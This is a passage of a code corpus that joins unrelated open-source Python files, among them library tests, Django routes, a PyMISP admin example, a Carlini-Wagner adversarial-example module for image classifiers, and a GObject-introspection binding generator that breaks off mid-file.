np.save('{0}/albedoError_{1}.npy'.format(opt.experiment, epoch), albedoErrsNpList )
np.save('{0}/normalError_{1}.npy'.format(opt.experiment, epoch), normalErrsNpList )
np.save('{0}/roughError_{1}.npy'.format(opt.experiment, epoch), roughErrsNpList )
np.save('{0}/depthError_{1}.npy'.format(opt.experiment, epoch), depthErrsNpList )
np.save('{0}/normalNYUError_{1}.npy'.format(opt.experiment, epoch), normalNYUErrsNpList )
np.save('{0}/angleNYUError_{1}.npy'.format(opt.experiment, epoch), angleNYUErrsNpList )
# save the models
torch.save(encoder.module, '{0}/encoder{1}_{2}.pth'.format(opt.experiment, opt.cascadeLevel, epoch) )
torch.save(albedoDecoder.module, '{0}/albedo{1}_{2}.pth'.format(opt.experiment, opt.cascadeLevel, epoch) )
torch.save(normalDecoder.module, '{0}/normal{1}_{2}.pth'.format(opt.experiment, opt.cascadeLevel, epoch) )
torch.save(roughDecoder.module, '{0}/rough{1}_{2}.pth'.format(opt.experiment, opt.cascadeLevel, epoch) )
torch.save(depthDecoder.module, '{0}/depth{1}_{2}.pth'.format(opt.experiment, opt.cascadeLevel, epoch) )
|
astropy/time/tests/test_pickle.py | jayvdb/astropy | 445 | 12698163 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
import pickle
import numpy as np
from astropy.time import Time
class TestPickle:
"""Basic pickle test of time"""
def test_pickle(self):
times = ['1999-01-01 00:00:00.123456789', '2010-01-01 00:00:00']
t1 = Time(times, scale='utc')
for prot in range(pickle.HIGHEST_PROTOCOL):
t1d = pickle.dumps(t1, prot)
t1l = pickle.loads(t1d)
assert np.all(t1l == t1)
t2 = Time('2012-06-30 12:00:00', scale='utc')
for prot in range(pickle.HIGHEST_PROTOCOL):
t2d = pickle.dumps(t2, prot)
t2l = pickle.loads(t2d)
assert t2l == t2
|
runtime/java9_container.py | tobegit3hub/lambda-docker | 343 | 12698184 |
import basic_container
class Java9Container(basic_container.BasicContainer):
def __init__(self):
super(self.__class__, self).__init__()
self.image = "java:9"
self.command = 'sh -c "javac main.java && java main"'
self.file_extension = ".java"
|
tests/configlet/util/helpers.py | lolyu/sonic-mgmt | 132 | 12698186 | #! /usr/bin/env python
from datetime import datetime
import inspect
import logging
logger = logging.getLogger(__name__)
do_print = False
def log_init(name):
global logger
logger = logging.getLogger(name)
def log_msg(lgr_fn, m):
tstr = datetime.now().strftime("%H:%M:%S")
msg = "{}:{}:{} {}".format(inspect.stack()[2][1], inspect.stack()[2][2], tstr, m)
lgr_fn(msg)
if do_print:
print(msg)
def log_error(m):
log_msg(logger.error, m)
def log_info(m):
log_msg(logger.info, m)
def log_warn(m):
log_msg(logger.warning, m)
def log_debug(m):
log_msg(logger.debug, m)
def set_print():
global do_print
do_print = True
|
src/ralph/reports/urls.py | DoNnMyTh/ralph | 1,668 | 12698197 | # -*- coding: utf-8 -*-
from django.conf.urls import url
from ralph.reports import views
urlpatterns = [
url(
r'^category_model_report/?$',
views.CategoryModelReport.as_view(),
name='category_model_report'
),
url(
r'^category_model__status_report/?$',
views.CategoryModelStatusReport.as_view(),
name='category_model__status_report'
),
url(
r'^manufactured_category_model_report/?$',
views.ManufacturerCategoryModelReport.as_view(),
name='manufactured_category_model_report'
),
url(
r'^status_model_report/?$',
views.StatusModelReport.as_view(),
name='status_model_report'
),
url(
r'^asset_relations/?$',
views.AssetRelationsReport.as_view(),
name='asset-relations'
),
url(
r'^licence_relations/?$',
views.LicenceRelationsReport.as_view(),
name='licence-relations'
),
url(
r'^failures_report/?$',
views.FailureReport.as_view(),
name='failures-report'
),
url(
r'^supports_report/?$',
views.AssetSupportsReport.as_view(),
name='assets-supports'
),
]
|
examples/delete_user.py | chrisinmtown/PyMISP | 307 | 12698244 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pymisp import ExpandedPyMISP
from keys import misp_url, misp_key, misp_verifycert
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Delete the user with the given id. Keep in mind that disabling users (by setting the disabled flag via an edit) is always preferred to keep user associations to events intact.')
parser.add_argument("-i", "--user_id", help="The id of the user you want to delete.")
args = parser.parse_args()
misp = ExpandedPyMISP(misp_url, misp_key, misp_verifycert)
print(misp.delete_user(args.user_id))
|
pkg/build/lib/vtreat/transform.py | WinVector/pyvtreat | 104 | 12698257 | <filename>pkg/build/lib/vtreat/transform.py<gh_stars>100-1000
"""base class for user transforms"""
class UserTransform:
"""base class for user transforms, should express taking a set of k inputs to k outputs independently"""
def __init__(self, treatment):
self.y_aware_ = True
self.treatment_ = treatment
self.incoming_vars_ = []
self.derived_vars_ = []
# noinspection PyPep8Naming
def fit(self, X, y):
"""
sklearn API
:param X: explanatory values
:param y: dependent values
:return: self for method chaining
"""
raise NotImplementedError("base method called")
# noinspection PyPep8Naming
def transform(self, X):
"""
:param X: explanatory values
:return: transformed data
"""
raise NotImplementedError("base method called")
# noinspection PyPep8Naming
def fit_transform(self, X, y):
"""
:param X: explanatory values
:param y: dependent values
:return: transformed data
"""
self.fit(X, y)
return self.transform(X)
def __repr__(self):
return (
"vtreat.transform.UserTransform("
+ "treatment="
+ self.treatment_.__repr__()
+ ") {"
+ "'y_aware_': "
+ str(self.y_aware_)
+ ", "
+ "'treatment_': "
+ str(self.treatment_)
+ ", "
+ "'incoming_vars_': "
+ str(self.incoming_vars_)
+ "}"
)
def __str__(self):
return self.__repr__()
|
pyquil/_memory.py | stjordanis/pyquil | 677 | 12698293 | <reponame>stjordanis/pyquil<filename>pyquil/_memory.py<gh_stars>100-1000
from dataclasses import dataclass, field
import dataclasses
from typing import Dict, Mapping, Sequence, Union
from rpcq.messages import ParameterAref
ParameterValue = Union[int, float, Sequence[int], Sequence[float]]
@dataclass
class Memory:
"""
Memory encapsulates the values to be sent as parameters alongside a program at time of
execution, and read back afterwards.
"""
values: Dict[ParameterAref, Union[int, float]] = field(default_factory=dict)
def copy(self) -> "Memory":
"""
Return a deep copy of this Memory object.
"""
return Memory(values={dataclasses.replace(k): v for k, v in self.values.items()})
def write(self, parameter_values: Mapping[Union[str, ParameterAref], ParameterValue]) -> "Memory":
"""
Set the given values for the given parameters.
"""
for parameter, parameter_value in parameter_values.items():
self._write_value(parameter=parameter, value=parameter_value)
return self
def _write_value(
self,
*,
parameter: Union[ParameterAref, str],
value: ParameterValue,
) -> "Memory":
"""
Mutate the program to set the given parameter value.
:param parameter: Name of the memory region, or parameter reference with offset.
:param value: the value or values to set for this parameter. If a list
is provided, parameter must be a ``str`` or ``parameter.offset == 0``.
"""
if isinstance(parameter, str):
parameter = ParameterAref(name=parameter, index=0)
import numpy as np
if isinstance(value, (int, float)):
self.values[parameter] = value
elif isinstance(value, (Sequence, np.ndarray)):
if parameter.index != 0:
raise ValueError("Parameter may not have a non-zero index when its value is a sequence")
for index, v in enumerate(value):
if not isinstance(v, (int, float)):
raise TypeError(f"Parameter must be numeric, not {type(value)}")
aref = ParameterAref(name=parameter.name, index=index)
self.values[aref] = v
else:
raise TypeError(f"Parameter must be numeric or an iterable of numeric values, not {type(value)}")
return self
|
core/src/main/python/akdl/akdl/tests/config/test_config.py | starburst-project/Alink | 3,301 | 12698319 | import unittest
import tensorflow as tf
if tf.__version__ >= '2.0':
tf = tf.compat.v1
from akdl.runner.config import BatchTaskConfig, StreamTaskConfig, TrainTaskConfig
def print_dataset(dataset: tf.data.Dataset):
next_record = dataset.make_one_shot_iterator().get_next()
counter = 0
with tf.Session() as sess:
while True:
try:
record = sess.run(next_record)
example = tf.train.Example.FromString(record)
if counter < 10:
print(example)
counter += 1
except tf.errors.OutOfRangeError:
break
print("total examples: " + str(counter))
def batch_main(args: BatchTaskConfig):
print_dataset(args.dataset)
def stream_main(args: StreamTaskConfig):
print_dataset(args.dataset_fn())
def train_main(args: TrainTaskConfig):
print_dataset(args.dataset)
class TestConfig(unittest.TestCase):
def test_batch_task_config(self):
tfrecords_path = "dataset.tfrecords"
batch_main(BatchTaskConfig(
tf_context=None,
cluster=None,
dataset_length=None,
dataset=tf.data.TFRecordDataset(tfrecords_path),
task_type='chief',
task_index=0,
num_workers=1,
work_dir=None,
dataset_file=tfrecords_path,
user_params={},
output_writer=None
))
def test_stream_task_config(self):
tfrecords_path = "dataset.tfrecords"
stream_main(StreamTaskConfig(
tf_context=None,
cluster=None,
dataset_length=None,
dataset_fn=lambda: tf.data.TFRecordDataset(tfrecords_path),
task_type='chief',
task_index=0,
num_workers=1,
work_dir=None,
user_params={},
output_writer=None
))
def test_train_task_config(self):
tfrecords_path = "dataset.tfrecords"
train_main(TrainTaskConfig(
tf_context=None,
cluster=None,
dataset_length=None,
dataset=tf.data.TFRecordDataset(tfrecords_path),
task_type='chief',
task_index=0,
num_workers=1,
work_dir=None,
dataset_file=tfrecords_path,
user_params={},
saved_model_dir=None
))
|
StackApp/env/lib/python2.7/site-packages/flask_api/tests/test_settings.py | jonathanmusila/StackOverflow-Lite | 555 | 12698324 | # coding: utf8
from __future__ import unicode_literals
from flask_api.settings import APISettings
import unittest
class SettingsTests(unittest.TestCase):
def test_bad_import(self):
settings = APISettings({'DEFAULT_PARSERS': 'foobarz.FailedImport'})
with self.assertRaises(ImportError) as context:
settings.DEFAULT_PARSERS
msg = str(context.exception)
excepted_py2 = (
"Could not import 'foobarz.FailedImport' for API setting "
"'DEFAULT_PARSERS'. No module named foobarz."
)
excepted_py3 = (
"Could not import 'foobarz.FailedImport' for API setting "
"'DEFAULT_PARSERS'. No module named 'foobarz'."
)
self.assertIn(msg, (excepted_py2, excepted_py3))
|
src/towncrier/_project.py | hawkowl/towncrier | 252 | 12698356 | <reponame>hawkowl/towncrier<filename>src/towncrier/_project.py
# Copyright (c) <NAME>, 2015
# See LICENSE for details.
"""
Responsible for getting the version and name from a project.
"""
import sys
from importlib import import_module
from incremental import Version
def _get_package(package_dir, package):
try:
module = import_module(package)
except ImportError:
# Package is not already available / installed.
# Force importing it based on the source files.
sys.path.insert(0, package_dir)
try:
module = import_module(package)
except ImportError as e:
err = f"tried to import {package}, but ran into this error: {e}"
# NOTE: this might be redirected via "towncrier --draft > …".
print(f"ERROR: {err}")
raise
finally:
sys.path.pop(0)
return module
def get_version(package_dir, package):
module = _get_package(package_dir, package)
version = getattr(module, "__version__", None)
if not version:
raise Exception("No __version__, I don't know how else to look")
if isinstance(version, str):
return version.strip()
if isinstance(version, Version):
return version.base().strip()
if isinstance(version, tuple):
return ".".join(map(str, version)).strip()
raise Exception(
"I only know how to look at a __version__ that is a str, "
"an Increment Version, or a tuple. If you can't provide "
"that, use the --version argument and specify one."
)
def get_project_name(package_dir, package):
module = _get_package(package_dir, package)
version = getattr(module, "__version__", None)
if not version:
# welp idk
return package.title()
if isinstance(version, str):
return package.title()
if isinstance(version, Version):
# Incremental has support for package names
return version.package
|
pytorch_ares/pytorch_ares/attack_torch/cw.py | thu-ml/realsafe | 107 | 12698368 | import numpy as np
import torch
from torch.autograd import Variable
class CW(object):
def __init__(self, model, device,norm, IsTargeted, kappa, lr, init_const, max_iter, binary_search_steps, data_name):
self.net = model
self.device = device
self.IsTargeted = IsTargeted
self.kappa = kappa #0
self.learning_rate = lr #0.2
self.init_const = init_const #0.01
self.lower_bound = 0.0 #0.0
self.upper_bound = 1.0 #1.0
self.max_iter = max_iter #200
self.norm = norm
self.binary_search_steps = binary_search_steps #4
self.data_name = data_name
if self.data_name=='imagenet':
self.class_type_number=1000
else:
self.class_type_number = 10
if self.data_name=="cifar10" and self.IsTargeted:
raise AssertionError('cifar10 dont support targeted attack')
if self.norm==np.inf:
raise AssertionError('curreent cw dont support linf')
assert self.norm==2
def atanh(self, x):
return 0.5 * torch.log((1 + x) / (1 - x))
def forward(self, xs=None, ys=None, ytarget=None):
device = self.device
targeted = self.IsTargeted
copy_xs = xs.clone()
copy_ys = ys.clone()
if ytarget is not None:
copy_ytarget = ytarget.clone()
else:
copy_ytarget = copy_ys #没有啥作用,只是随便给个值
batch_size = xs.shape[0]#10
mid_point = (self.upper_bound + self.lower_bound) * 0.5 #0.5
half_range = (self.upper_bound - self.lower_bound) * 0.5 #0.5
arctanh_xs = self.atanh((copy_xs - mid_point) / half_range * 0.9999) #(10,3,32,32)
# var_xs = Variable(torch.from_numpy(arctanh_xs).to(device), requires_grad=True) #torch.Size([10, 3, 32, 32])
var_xs=arctanh_xs.clone()
var_xs.requires_grad=True
const_origin = torch.ones(batch_size, device=self.device) * self.init_const #0.01的矩阵
c_upper_bound = [1e10] * batch_size
c_lower_bound = torch.zeros(batch_size, device=self.device)
targets_in_one_hot = []
targeteg_class_in_one_hot = []
temp_one_hot_matrix = torch.eye(int(self.class_type_number), device=self.device)
if targeted:
for i in range(batch_size):
current_target1 = temp_one_hot_matrix[copy_ytarget[i]]
targeteg_class_in_one_hot.append(current_target1)
targeteg_class_in_one_hot = torch.stack(targeteg_class_in_one_hot).clone().type_as(xs).to(self.device) #torch.Size([10, 10])
else:
for i in range(batch_size):
current_target = temp_one_hot_matrix[copy_ys[i]]
targets_in_one_hot.append(current_target)
targets_in_one_hot = torch.stack(targets_in_one_hot).clone().type_as(xs).to(self.device) #torch.Size([10, 10])
best_l2 = [1e10] * batch_size
best_perturbation = torch.zeros(var_xs.size()) #(10, 3, 32, 32)
current_prediction_class = [-1] * batch_size
def attack_achieved(pre_softmax, true_class, target_class):
targeted = self.IsTargeted
if targeted:
pre_softmax[target_class] -= self.kappa
return torch.argmax(pre_softmax).item() == target_class
else:
pre_softmax[true_class] -= self.kappa
return torch.argmax(pre_softmax).item() != true_class
for search_for_c in range(self.binary_search_steps):
modifier = torch.zeros(var_xs.shape).float()
modifier = Variable(modifier.to(device), requires_grad=True)
optimizer = torch.optim.Adam([modifier], lr=self.learning_rate)
var_const = const_origin.clone().to(device)
print("\tbinary search step {}:".format(search_for_c))
for iteration_times in range(self.max_iter):
# inverse the transform tanh -> [0, 1]
perturbed_images = (torch.tanh(var_xs + modifier) * half_range + mid_point)
prediction = self.net(perturbed_images)
l2dist = torch.sum(
(perturbed_images - (torch.tanh(var_xs) * half_range + mid_point))
** 2,
[1, 2, 3],
)
if targeted:
constraint_loss = torch.max((prediction - 1e10 * targeteg_class_in_one_hot).max(1)[0] - (prediction * targeteg_class_in_one_hot).sum(1),
torch.ones(batch_size, device=device) * self.kappa * -1,
)
else:
constraint_loss = torch.max((prediction * targets_in_one_hot).sum(1)
- (prediction - 1e10 * targets_in_one_hot).max(1)[0],
torch.ones(batch_size, device=device) * self.kappa * -1,
)
loss_f = var_const * constraint_loss
loss = l2dist.sum() + loss_f.sum() # minimize |r| + c * loss_f(x+r,l)
optimizer.zero_grad()
loss.backward(retain_graph=True)
optimizer.step()
# update the best l2 distance, current predication class as well as the corresponding adversarial example
# for i, (dist, score, img) in enumerate(
# zip(
# l2dist.data.cpu().numpy(),
# prediction.data.cpu().numpy(),
# perturbed_images.data.cpu().numpy(),
# )
# ):
for i in range(prediction.shape[0]):
dist=l2dist[i]
score=prediction[i]
img=perturbed_images[i]
if dist.item() < best_l2[i] and attack_achieved(score, copy_ys[i], copy_ytarget[i]):
best_l2[i] = dist
current_prediction_class[i] = torch.argmax(score)
best_perturbation[i] = img
# update the best constant c for each sample in the batch
for i in range(batch_size):
if (
current_prediction_class[i] == copy_ys[i].item()
and current_prediction_class[i] != -1
):
c_upper_bound[i] = min(c_upper_bound[i], const_origin[i].item())
if c_upper_bound[i] < 1e10:
const_origin[i] = (c_lower_bound[i].item() + c_upper_bound[i]) / 2.0
else:
c_lower_bound[i] = max(c_lower_bound[i].item(), const_origin[i].item())
if c_upper_bound[i] < 1e10:
const_origin = (c_lower_bound[i].item() + c_upper_bound[i]) / 2.0
else:
const_origin[i] *= 10
adv_xs = best_perturbation.to(device)
return adv_xs |
bindings/java/gir_parser.py | george-hopkins/pkg-openwebrtc | 1,604 | 12698386 | # Copyright (c) 2014-2015, Ericsson AB. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or other
# materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE.
from __future__ import print_function
import xml.etree.ElementTree as ET
import itertools
from standard_types import VoidType, IntType, LongPtrType, GParamSpecType, JObjectWrapperType
from standard_types import ClassCallbackMetaType, GObjectMetaType, CallbackMetaType
from standard_types import EnumMetaType, BitfieldMetaType, GWeakRefType, JDestroyType
from copy import copy
NS = '{http://www.gtk.org/introspection/core/1.0}'
C_NS = '{http://www.gtk.org/introspection/c/1.0}'
GLIB_NS = '{http://www.gtk.org/introspection/glib/1.0}'
TAG_CLASS = NS + 'class'
TAG_NAMESPACE = NS + 'namespace'
TAG_INCLUDE = NS + 'include'
TAG_CONSTRUCTOR = NS + 'constructor'
TAG_RETURN_VALUE = NS + 'return-value'
TAG_TYPE = NS + 'type'
TAG_ARRAY = NS + 'array'
TAG_PARAMETERS = NS + 'parameters'
TAG_VIRTUAL_METHOD = NS + 'virtual-method'
TAG_PARAMETER = NS + 'parameter'
TAG_PROPERTY = NS + 'property'
TAG_RECORD = NS + 'record'
TAG_FIELD = NS + 'field'
TAG_ENUMERATION = NS + 'enumeration'
TAG_MEMBER = NS + 'member'
TAG_DOC = NS + 'doc'
TAG_CALLBACK = NS + 'callback'
TAG_INSTANCE_PARAMETER = NS + 'instance-parameter'
TAG_METHOD = NS + 'method'
TAG_BITFIELD = NS + 'bitfield'
TAG_FUNCTION = NS + 'function'
TAG_SIGNAL = GLIB_NS + 'signal'
TAG_INTERFACE = NS + 'interface'
TAG_IMPLEMENTS = NS + 'implements'
ATTR_NAME = 'name'
ATTR_WHEN = 'when'
ATTR_VALUE = 'value'
ATTR_SCOPE = 'scope'
ATTR_LENGTH = 'length'
ATTR_PARENT = 'parent'
ATTR_CLOSURE = 'closure'
ATTR_DESTORY = 'destroy'
ATTR_READABLE = 'readable'
ATTR_WRITABLE = 'writable'
ATTR_ALLOW_NONE = 'allow-none'
ATTR_INTROSPECTABLE = 'introspectable'
ATTR_CONSTRUCT_ONLY = 'construct-only'
ATTR_SHARED_LIBRARY = 'shared-library'
ATTR_ZERO_TERMINATED = 'zero-terminated'
ATTR_TRANSFER_ONWERSHIP = 'transfer-ownership'
ATTR_C_IDENTIFIER_PREFIXES = C_NS + 'identifier-prefixes'
ATTR_C_IDENTIFIER = C_NS + 'identifier'
ATTR_C_SYMBOL_PREFIXES = C_NS + 'symbol-prefixes'
ATTR_C_SYMBOL_PREFIX = C_NS + 'symbol-prefix'
ATTR_C_TYPE = C_NS + 'type'
ATTR_GLIB_NICK = GLIB_NS + 'nick'
ATTR_GLIB_TYPE_NAME = GLIB_NS + 'type-name'
ATTR_GLIB_GET_TYPE = GLIB_NS + 'get-type'
ATTR_GLIB_TYPE_STRUCT = GLIB_NS + 'type-struct'
def printable(cls):
cls.__repr__ = lambda self: str(self.__dict__)
return cls
def partition(pred, iterable):
t1, t2 = itertools.tee(iterable)
return filter(pred, t1), filter(lambda x: not pred(x), t2)
def by_name(elements):
return {e.name: e for e in elements}
def title_case(st):
return ''.join(c for c in st.title() if c.isalpha())
def parse_doc(tag):
text = tag.findtext(TAG_DOC)
if text:
text = text.replace('\n', ' ')
return text
def camel_case(st):
st = title_case(st)
return st[0].lower() + st[1:]
def parse_tag_value(type_registry, tag, name=None):
def lookup_type(tag):
if tag.tag == TAG_ARRAY:
inner_tag = tag.find(TAG_TYPE)
gir_type = inner_tag.get(ATTR_NAME)
c_type = inner_tag.get(ATTR_C_TYPE)
return type_registry.lookup(gir_type, c_type, is_array=True)
else:
gir_type = tag.get(ATTR_NAME)
c_type = tag.get(ATTR_C_TYPE)
return type_registry.lookup(gir_type, c_type)
transfer = tag.get(ATTR_TRANSFER_ONWERSHIP)
type_tag = tag.find(TAG_TYPE)
if type_tag is None:
type_tag = tag.find(TAG_ARRAY)
scope = tag.get(ATTR_SCOPE)
allow_none = tag.get(ATTR_ALLOW_NONE) == '1'
inner_type_tags = type_tag.findall(TAG_TYPE)
if name is None:
name = tag.get(ATTR_NAME)
assert name
typ = lookup_type(type_tag)
value = None
if typ.is_container:
assert inner_type_tags
types = enumerate(map(lookup_type, inner_type_tags))
type_params = [c(name + '_' + str(i), transfer == 'full') for i, c in types]
value = typ(name, transfer != 'none', allow_none, *type_params)
else:
assert transfer != 'container'
if typ.is_array:
c_array_type = type_tag.get(ATTR_C_TYPE)
value = typ(name, transfer == 'full', allow_none, c_array_type)
else:
if scope is not None:
value = typ(name, transfer == 'full', allow_none, scope)
else:
value = typ(name, transfer == 'full', allow_none)
value.doc = parse_doc(tag)
return value
@printable
class Parameters(object):
def __init__(self, return_value, instance_param, params=None, java_params=None):
params = params or []
self.instance_param = instance_param
if return_value is None:
return_value = VoidType()
self.return_value = return_value
self.params = params
if instance_param is not None:
self.all_params = [instance_param] + params
else:
self.all_params = params
def is_closure_param(param):
return isinstance(param, JObjectWrapperType)
self.closure_params, self.java_params = partition(is_closure_param, params)
def is_length_param(param):
return param.is_length_param
self.length_params, self.java_params = partition(is_length_param, self.java_params)
if java_params:
self.java_params = java_params
def set_parent(param):
if param is not None:
param.parent = self
map(set_parent, [return_value, instance_param] + params)
def __iter__(self):
return iter(self.all_params)
@classmethod
def from_tag(cls, type_registry, tag):
return_value = parse_tag_value(type_registry, tag.find(TAG_RETURN_VALUE), 'result')
params_tag = tag.find(TAG_PARAMETERS)
if params_tag is None:
return cls(return_value, None)
closure_refs = {}
destroy_refs = {}
array_refs = {}
for tag_index, tag in enumerate(params_tag.findall(TAG_PARAMETER)):
closure = tag.get(ATTR_CLOSURE)
if closure is not None:
closure_refs[int(closure)] = tag_index
destroy = tag.get(ATTR_DESTORY)
if destroy is not None:
destroy_refs[int(destroy)] = tag_index
array_tag = tag.find(TAG_ARRAY)
if array_tag is not None:
length = array_tag.get(ATTR_LENGTH)
if length is not None:
array_refs[int(length)] = tag_index
params = []
instance_param = None
real_tag_index = 0
for tag in params_tag:
if tag.tag == TAG_INSTANCE_PARAMETER:
assert real_tag_index == 0
instance_param = parse_tag_value(type_registry, tag)
else:
if closure_refs.get(real_tag_index) is not None:
name = tag.get(ATTR_NAME)
closure_index = closure_refs.get(real_tag_index)
closure = None
if closure_index == real_tag_index - 1:
closure = params[-1]
else:
assert closure_index == real_tag_index
params.append(JObjectWrapperType(name, closure, transfer_ownership=True))
elif destroy_refs.get(real_tag_index) is not None:
name = tag.get(ATTR_NAME)
destroy_index = destroy_refs.get(real_tag_index)
assert destroy_index == real_tag_index - 2
params[-2].scope == 'notified'
params.append(JDestroyType(name))
elif array_refs.get(real_tag_index) is not None:
array_index = array_refs.get(real_tag_index)
assert array_index == real_tag_index - 1
array = params[-1]
value = parse_tag_value(type_registry, tag)
value.is_length_param = True
value.array = array
array.length = value
params.append(value)
else:
params.append(parse_tag_value(type_registry, tag))
real_tag_index += 1
return cls(return_value, instance_param, params)
@printable
class Property(object):
def __init__(self, name, value, class_value, readable, writable, construct_only):
self.name = name
self.value = value
self.readable = readable
self.writable = writable
self.construct_only = construct_only
if readable:
get_value = copy(value)
get_value.transfer_ownership = not get_value.transfer_ownership
self.getter = Method(
c_name=None,
name='get' + title_case(name),
params=Parameters(get_value, class_value),
)
self.signal = Signal(
name='on' + title_case(name) + 'Changed',
params=Parameters(None, class_value, [
GParamSpecType('pspec', transfer_ownership=False),
JObjectWrapperType('listener', None, transfer_ownership=False),
], java_params=[value]),
signal_name='notify::' + name,
interface_name=title_case(name) + 'ChangeListener',
class_value=class_value,
when='first',
)
if writable:
self.setter = Method(
c_name=None,
name='set' + title_case(name),
params=Parameters(None, class_value, [value]),
)
@classmethod
def from_tag(cls, type_registry, class_value, tag):
name = tag.get(ATTR_NAME)
return cls(
name=name,
value=parse_tag_value(type_registry, tag, camel_case(name)),
class_value=class_value,
readable=str(tag.get(ATTR_READABLE)) != '0',
writable=str(tag.get(ATTR_WRITABLE)) == '1' and str(tag.get(ATTR_CONSTRUCT_ONLY)) != '1',
construct_only=bool(tag.get(ATTR_CONSTRUCT_ONLY)),
)
@printable
class BaseFunction(object):
def __init__(self, name, params, c_name=None, doc=None):
self.name = name
self.c_name = c_name
self.params = params
self.doc = doc
@property
def method_signature(self):
arg_signature = ''.join((p.java_signature for p in self.params.java_params if p.java_signature is not None))
return '(' + arg_signature + ')' + self.params.return_value.java_signature
@classmethod
def from_tag(cls, type_registry, tag):
return cls(
doc=parse_doc(tag),
name=camel_case(tag.get(ATTR_NAME)),
c_name=tag.get(ATTR_C_IDENTIFIER),
params=Parameters.from_tag(type_registry, tag),
)
class Function(BaseFunction):
pass
class Method(BaseFunction):
pass
class Constructor(BaseFunction):
def __init__(self, **kwargs):
super(Constructor, self).__init__(**kwargs)
p = self.params
self.params = Parameters(GWeakRefType('instance_pointer'), p.instance_param, p.params)
self.name = 'nativeConstructor'
class Callback(BaseFunction):
def __init__(self, value, **kwargs):
super(Callback, self).__init__(**kwargs)
self.value = value
@classmethod
def from_tag(cls, type_registry, tag):
callback_name = tag.get(ATTR_NAME)
callback_value = type_registry.lookup(callback_name, None)('listener', False)
return cls(
doc=parse_doc(tag),
name='on' + callback_name,
value=callback_value,
params=Parameters.from_tag(type_registry, tag),
)
class Signal(BaseFunction):
def __init__(self, signal_name, interface_name, class_value, when, **kwargs):
BaseFunction.__init__(self, **kwargs)
self.signal_name = signal_name
self.when = when
listener_value = ClassCallbackMetaType(
java_type=interface_name,
outer=class_value,
)('listener')
handle_value = IntType('handle', transfer_ownership=False)
closure_value = JObjectWrapperType('user_data', listener_value, transfer_ownership=False)
self.add_listener = Method(
c_name=None,
name='connect' + listener_value.java_type,
params=Parameters(handle_value, class_value, [listener_value, closure_value]),
)
self.remove_listener = Method(
c_name=None,
name='disconnect' + listener_value.java_type,
params=Parameters(None, class_value, [handle_value]),
)
self.public_add_listener = Method(
c_name=None,
name='add' + listener_value.java_type,
params=Parameters(None, None, [listener_value]),
)
self.public_remove_listener = Method(
c_name=None,
name='remove' + listener_value.java_type,
params=Parameters(None, None, [listener_value]),
)
self.value = listener_value
@classmethod
def from_tag(cls, type_registry, class_value, tag):
signal_name = tag.get(ATTR_NAME)
parsed_params = Parameters.from_tag(type_registry, tag)
return_value = parsed_params.return_value
params = parsed_params.all_params if parsed_params is not None else []
params = [return_value, class_value] + [params + [JObjectWrapperType('listener', None, transfer_ownership=False)]]
return cls(
name=camel_case(signal_name),
signal_name=signal_name,
interface_name=title_case(signal_name) + 'Listener',
class_value=class_value,
when=tag.get(ATTR_WHEN),
params=Parameters(*params),
)
@printable
class Class(object):
def __init__(self, **kwargs):
self.__dict__.update(**kwargs)
@classmethod
def from_tag(cls, type_registry, tag, interfaces=None):
parent = tag.get(ATTR_PARENT)
if parent == 'GObject.Object':
parent = None
name = tag.get(ATTR_NAME)
value = type_registry.lookup(name, None)('self')
return cls(
name=name,
parent=parent,
c_type=tag.get(ATTR_C_TYPE),
value=value,
c_symbol_prefix=tag.get(ATTR_C_SYMBOL_PREFIX),
glib_type_name=tag.get(ATTR_GLIB_TYPE_NAME),
glib_get_type=tag.get(ATTR_GLIB_GET_TYPE),
glib_type_struct=tag.get(ATTR_GLIB_TYPE_STRUCT),
constructors=[Constructor.from_tag(type_registry, t) for t in tag.findall(TAG_CONSTRUCTOR) if t.get(ATTR_INTROSPECTABLE) != '0'],
properties=[Property.from_tag(type_registry, value, t) for t in tag.findall(TAG_PROPERTY) if t.get(ATTR_INTROSPECTABLE) != '0'],
methods=[Method.from_tag(type_registry, t) for t in tag.findall(TAG_METHOD) if t.get(ATTR_INTROSPECTABLE) != '0'],
functions=[Function.from_tag(type_registry, t) for t in tag.findall(TAG_FUNCTION) if t.get(ATTR_INTROSPECTABLE) != '0'],
signals=[Signal.from_tag(type_registry, value, t) for t in tag.findall(TAG_SIGNAL) if t.get(ATTR_INTROSPECTABLE) != '0'],
interfaces=[interfaces[t.get(ATTR_NAME)] for t in tag.findall(TAG_IMPLEMENTS)],
)
@printable
class EnumMember(object):
def __init__(self, value, name, c_name, nick=None, description=None):
self.value = value
self.name = name
self.c_name = c_name
self.nick = nick
self.description = description
@classmethod
def from_tag(cls, tag, glib_tag=None):
value = tag.get(ATTR_VALUE)
if glib_tag is not None:
assert value == glib_tag.get(ATTR_VALUE)
return cls(
value=value,
name=tag.get(ATTR_NAME).upper(),
c_name=tag.get(ATTR_C_IDENTIFIER),
nick=glib_tag.get(ATTR_GLIB_NICK),
description=glib_tag.get(ATTR_C_IDENTIFIER),
)
else:
return cls(
value=value,
name=tag.get(ATTR_NAME).upper(),
c_name=tag.get(ATTR_C_IDENTIFIER),
